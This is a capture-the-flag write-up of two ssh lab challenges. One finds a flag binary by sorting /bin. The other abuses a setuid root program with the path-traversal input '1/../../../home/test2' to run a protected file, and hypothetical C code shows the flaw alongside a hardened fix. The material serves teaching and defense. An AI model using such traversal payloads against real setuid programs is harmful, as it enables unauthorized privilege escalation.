Q1
- ssh, binary file, directory structure, sorting
1. Connect over ssh
$ ssh test1@ssh.knock-on.org
...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
test1@5f882d6040af:~$
2. Check the hint
test1@a7c4fa4b85a6:~$ ls
HINT
test1@a7c4fa4b85a6:~$ cat HINT
Some binaries appear to print flags..
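3. Expect the flag to be in a directory that holds binaries, such as /bin
However, binaries live in many directories, not only /bin: /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin, /opt, and so on
-> Going through all of them and inspecting every binary would take a long time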
test1@5f882d6040af:/bin$ ls -al
total 22180
drwxr-xr-x 1 root root 4096 Feb 24 03:48 .
drwxr-xr-x 1 root root 4096 Feb 12 14:02 ..
-rwxr-xr-x 1 root root 51648 Jan 8 14:56 '['
-rwxr-xr-x 1 root root 14712 Feb 21 2022 addpart
-rwxr-xr-x 1 root root 18824 Oct 6 08:53 apt
-rwxr-xr-x 1 root root 84448 Oct 6 08:53 apt-cache
-rwxr-xr-x 1 root root 27104 Oct 6 08:53 apt-cdrom
-rwxr-xr-x 1 root root 27024 Oct 6 08:53 apt-config
-rwxr-xr-x 1 root root 51680 Oct 6 08:53 apt-get
-rwxr-xr-x 1 root root 28173 Oct 6 08:53 apt-key
-rwxr-xr-x 1 root root 51680 Oct 6 08:53 apt-mark
...
# Too many!
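4. Sort the listing
Use the fact that a binary made by the challenge author was probably created recently
Sort by time, for example with ls -lt, to solve it
Alternatively, search for keywords you can guess, such as flag or test.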
test1@5f882d6040af:/bin$ ls -lt
total 22164
-rwxr-xr-x 1 root root 15968 Feb 24 03:47 echoflag
-rwxr-xr-x 1 root root 320 Feb 12 14:06 man
lrwxrwxrwx 1 root root 23 Feb 12 14:03 pager -> /etc/alternatives/pager
...
# The most recently created file, echoflag, has a suspicious name!
test1@5f882d6040af:/bin$ find . -name "*flag*"
./echoflag
5. Run the binary we found
test1@5f882d6040af:/bin$ ./echoflag
Wow you find it! the flag is KNOCKON{y0u_und3rst4nd_ab0ut_/b1n}
Q2
- ssh, setuid, find, relative paths
1. Connect over ssh
$ ssh test2@ssh.knock-on.org
...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
test2@4f882e6020ad:~$
2. Check the hint
test2@c260433388cb:~$ ls
FLAG HINT
test2@c260433388cb:~$ ./FLAG
bash: ./FLAG: Permission denied
test2@c260433388cb:~$ cat HINT
Finding a filename with 'Reader' in it might bring good fortune..
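3. Use find to search for a program whose name contains the string "Reader"
- / : start at the top-level directory and search its subdirectories recursively
- -type f: search regular files only
- -name "*Reader*" : match files whose name contains Reader (the * on each side is a wildcard)
- 2>/dev/null: discard unneeded error messages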
$ find / -type f -name "*Reader*" 2>/dev/null
/opt/fairyReaderV2
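4. Confirm that the program has the setuid bit set
- Simply put, setuid is a mechanism that temporarily gives you root privileges only while that program is running
- We could not access the original FLAG because we lacked permission, so the thought is: this program can get us in!
- In the ls output, an s appears in place of x, which shows that setuid is set.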
test2@e3a6f21df709:$ ls -l /opt/fairyReaderV2
-rwsrwsr-x 1 root root 16344 Feb 24 08:15 fairyReaderV2
5. Running the program shows that it appends the input to /opt/data/story and runs the file at the resulting location
Let's steer the path to where the flag we want is located!
test2@c260433388cb:/opt$ ./fairyReaderV2
I'll tell you a dreamlike fairy tale :)
Let me know which Episode you'd like to hear!
Input Episode number (1~10) : 1
Once upon a time, in a small town nestled between rolling hills and sparkling rivers, lived a cat named Whiskers. Whiskers was not your ordinary cat. He had a peculiar habit of walking backwards. It was a sight that amused many but bewildered even more.
Book is in here! -> /opt/data/story1/FLAG
Input Episode number (1~10) : 2
Every morning, Whiskers would start his day by stretching his legs, always backwards, then proceed to the kitchen where his bowl awaited. Instead of eating immediately, he'd circle the bowl three times, counterclockwise, before taking a single bite. Then, he'd sit by the window, gazing outside, contemplating the mysteries of the universe, or perhaps just watching the birds.
Book is in here! -> /opt/data/story2/FLAG
Input Episode number (1~10) : 3
The townsfolk had grown accustomed to Whiskers and his odd ways. Children would giggle as they watched him, and adults would shake their heads in disbelief. But there was something about Whiskers that everyone admired. Despite his peculiarities, he carried himself with an air of confidence.
Book is in here! -> /opt/data/story3/FLAG
Input Episode number (1~10) : 4
One day, a traveling circus came to town, bringing with it wonders from around the world. The circus had a magician who claimed he could communicate with animals. Intrigued, the townspeople urged him to speak with Whiskers.
Book is in here! -> /opt/data/story4/FLAG
Input Episode number (1~10) : 5
The magician, a tall man with a top hat adorned with stars, agreed. He sat down with Whiskers, and to everyone's astonishment, they seemed to engage in a deep, albeit silent, conversation. After a few moments, the magician stood up and announced, "Whiskers has shared with me the secret of his backward walk."
Book is in here! -> /opt/data/story5/FLAG
Input Episode number (1~10) : 6
The crowd leaned in, eager to hear the wisdom imparted by their backward-walking cat. "Whiskers walks backwards to remind us that sometimes in life, we need to take a step back to truly appreciate where we are and where we're going," the magician declared.
Book is in here! -> /opt/data/story6/FLAG
Input Episode number (1~10) : 7
There was a moment of silence as the townsfolk processed this revelation. Then, almost as one, they erupted in applause. Whiskers, seemingly unfazed by his newfound fame, simply yawned and sauntered off, backwards as always, leaving behind a trail of smiles and a slightly less ordinary town.
Book is in here! -> /opt/data/story7/FLAG
Input Episode number (1~10) : 8
From that day forward, the people of the town occasionally tried walking backwards, just like Whiskers. They found that it indeed offered a new perspective on the world around them. While not everyone adopted the practice permanently, it served as a reminder of the lesson Whiskers had, in his own unique way, taught them: sometimes, a different approach can reveal beauty and truths previously unnoticed.
Book is in here! -> /opt/data/story8/FLAG
Input Episode number (1~10) : 9
And so, life in the small town went on, enriched by the presence of a cat who dared to walk differently. Whiskers continued his backward strolls, a small figure moving against the tide, inspiring those who watched him to occasionally glance back and appreciate the path they'd traveled.
Book is in here! -> /opt/data/story9/FLAG
Input Episode number (1~10) : 10
Actually, the `story` is related only to getting the FLAG.
Book is in here! -> /opt/data/story10/FLAG
Input Episode number (1~10) : asdf
No book in here! -> /opt/data/storyasdf/FLAG
Input Episode number (1~10) : 1/../../../home/test2
KNOCKON{f41ry_t4l3_1s_s000000_b0r1ng!!}
Book is in here! -> /opt/data/story1/../../../home/test2/FLAG
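The files this executable runs all start from /opt/data/story, and the data folder holds ten folders, story1 through story10. Each of them contains a FLAG file, and running that file prints the fairy tale shown above. So the idea is to reach the folder at the destination we actually want and open the FLAG there. Starting from /opt/data/story1 (any of 1~10 works), one ../ gives /opt/data, another ../ gives /opt, and one more ../ puts us in the top-level directory. The FLAG we are looking for was in /home/test2, so we move the path there and have the program run the FLAG in that location.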
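
An added example, not the challenge binary's source (the page does not show it): a hypothetical C reconstruction of the path handling that the session above implies, beside a hardened form. The function names and the assumption that the input is pasted straight into the path are illustrative; the /opt/data/story prefix and the sample inputs are taken from the session.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define STORY_PREFIX "/opt/data/story" /* prefix seen in the program's output */

/* Assumed "before": raw input is pasted between the prefix and "/FLAG". */
int build_path_unsafe(const char *input, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s%s/FLAG", STORY_PREFIX, input);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened: accept only a decimal integer 1..10 with nothing after it.
 * The caller strips the trailing newline left by fgets() first. */
int parse_episode(const char *input, long *episode)
{
    char *end = NULL;
    if (input == NULL || input[0] < '0' || input[0] > '9')
        return -1;                    /* rejects sign, whitespace, empty */
    errno = 0;
    long v = strtol(input, &end, 10);
    if (errno != 0 || *end != '\0' || v < 1 || v > 10)
        return -1;                    /* rejects "1/../..", "asdf", "11" */
    *episode = v;
    return 0;
}

/* The path is rebuilt from the parsed number, never from the raw string. */
int build_path_safe(const char *input, char *out, size_t outlen)
{
    long ep;
    if (parse_episode(input, &ep) != 0)
        return -1;
    int n = snprintf(out, outlen, "%s%ld/FLAG", STORY_PREFIX, ep);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    const char *samples[] = { "1", "asdf", "1/../../../home/test2" }; /* inputs from the session */
    char path[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        build_path_unsafe(samples[i], path, sizeof path);
        printf("unsafe: %-24s -> %s\n", samples[i], path);
        printf("safe:   %-24s -> %s\n", samples[i],
               build_path_safe(samples[i], path, sizeof path) == 0 ? path : "(rejected)");
    }
    return 0;
}
```

In a setuid program a second layer is worth having: resolve the final path with realpath() and confirm it still begins with /opt/data/ before opening it.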